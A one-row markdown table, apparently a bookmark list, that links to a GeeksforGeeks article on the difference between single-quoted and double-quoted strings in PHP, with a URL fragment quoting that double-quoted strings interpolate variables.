Topic | Url |
---|---|
What is the difference between single-quoted and double-quoted strings in PHP? | https://www.geeksforgeeks.org/what-is-the-difference-between-single-quoted-and-double-quoted-strings-in-php/#:~:text=Double%2Dquoted%20strings%3A%20By%20using,variables%20directly%20within%20the%20string.&text=Each%20variable%20will%20be%20replaced%20by%20its%20value. |